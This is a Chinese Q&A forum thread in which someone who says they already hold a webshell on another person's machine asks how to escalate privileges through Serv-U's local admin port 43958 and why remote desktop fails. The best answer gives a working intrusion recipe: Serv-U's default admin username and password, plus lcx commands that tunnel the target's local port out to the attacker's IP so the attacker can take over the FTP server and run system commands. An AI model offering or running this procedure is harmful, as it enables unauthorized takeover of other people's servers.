永发信息网

高手们进,对方机子的43958端口开了,我在他的C盘上看到了ser-u这个软件了,但是他的21端口关闭

答案:2  悬赏:30  手机版
解决时间 2021-02-05 00:05
高手们进,

第一个问题:我已经获得一个webshell了,发现对方机子的43958端口开了,我也在他的C盘上看到了serv-u这个软件了,但是他的21端口关闭了,既然开启了serv-u这个软件,为什么21端口会关闭啊?? 难道是它把ftp服务的21端口换成其他了??
不知道我想的对不对啊?如果不对,那这是怎么回事。
第二个问题:这种情况下,我该怎么利用43958端口来进一步提权?

第三个问题:对方开启了3389,但他在外网中,并非在内网中,为什么我无法连接到它。我看网上说,连接不了对方的3389的一个原因是,他在内网,但他是外网中啊。

三个问题。问题有点多,我分也不高,但是是诚心求教大家。

谢谢大家啊。。。
我手头没有免杀的马啊,所以不存在占用端口之说。

我开始怀疑它 的3389这个口是不是不是远程桌面登录,而是其他功能用的端口,被管理员偷梁换柱了,而真正的远程桌面登录的端口换成其他了,比如:5000,(5000是我随便举例啊)。。

但是我读取注册表发现,远程桌面端口是3389啊,可是连接不上。。。它又在外网,很奇怪啊。。。。。。。它开着,我为什么无法连接啊。。。,无法理解这一点啊。

至于将43958端口映射的法子,我先尝试一下啊。 比较感谢 网友:网域花生壳
最佳答案
你不会是在用灰鸽子吧?
端口占用的可能性比较大
ftp提权问题,这个很简单摘录一段:
主要内容:利用webshell上传、执行功能,将默认serv-u ftp管理端口映射到外网,通过默认serv-u ftp连接密码,获得系统权限。

关键技术要点:serv-u ftp管理端口映射的详细方法。serv-u默认监听127.0.0.1:43958,serv-u默认管理账号是LocalAdministrator,默认密码是"#l@$ak#.lk;0@P",在本机才能连接这个管理端口,但是如果我们可以把这个端口转发到我们本机上,通过本机来连接远程主机的自连接端口,我们就能完全接管目标服务器的SERV_U,建立有完全权限的帐号连接上去为所欲为,而在转发过程中我们并不需要有ADMIN的权限,只要有运行端口转发工具的权限就可以了. #l@$ak#.lk;0@P在目标WEBSHELL上运行LCX lcx -slave 你的IP 5000 127.0.0.1 43958在本机上运行 lcx -listen 5000 21打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P此时的连接过程是本机连接21端口------------>转发往本机5000端口-------------->管道连接至远程机5000端口------------>转发至远程43958端口连接成功后,在本机登陆SERV_U就相当于登陆了远程的SERV_U你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令
全部回答
你好! 不要干坏事 希望对你有所帮助,望采纳。
我要举报
如以上问答信息为低俗、色情、不良、暴力、侵权、涉及违法等信息,可以点下面链接进行举报!
大家都在看
羊的毛色有黑色和白色之分,观察右图羊的毛色
添姿坊养生会馆在哪里啊,我有事要去这个地方
阴阳师雨女现世信物扫描什么 阴阳师雨女现世
win10系统下面的windows.old能删吗
额尔敦街道办事处社区卫生服务中心在哪里啊,
初一应用题(一元一次方程)汶川大地震发生后,
安居精品酒店地址有知道的么?有点事想过去
我的爱情里出现了第三者我应该去打电话联系吗
显示器在玩魔兽世界和cf这种全屏游戏时,显示
乐棒棒肖家湾店这个地址在什么地方,我要处理
想要减肥应该吃什么水果好
讲4个不同的小球放入3个不同盒子,其中每个盒
北京从沙河或昌平去香山玩。。怎么坐车呀?
钻戒的标志do141ct是什么意思au750的白金价钱
7块的红双喜有假烟吗?
推荐资讯
有人在公关公司工作过么
过年点篝火哪的习俗??
请大家看这道关于行政立法的试题
以柔和开头耳结尾的4字成语有那些
淘气宠物医院地址在什么地方,我要处理点事
华姿化妆品店地址好找么,我有些事要过去
新宇中漫步网咖地址在哪,我要去那里办事
有一个标有“12V 6W”字样的小灯泡:(1)如
2009年9月8日1时,河南省平顶山新华四矿发生
c语言宏定义 #define power(x) x*x x=1+2 求p
A2驾证代扣分多少钱一分
优思诺教育地址在哪,我要去那里办事
正方形一边上任一点到这个正方形两条对角线的
阴历怎么看 ?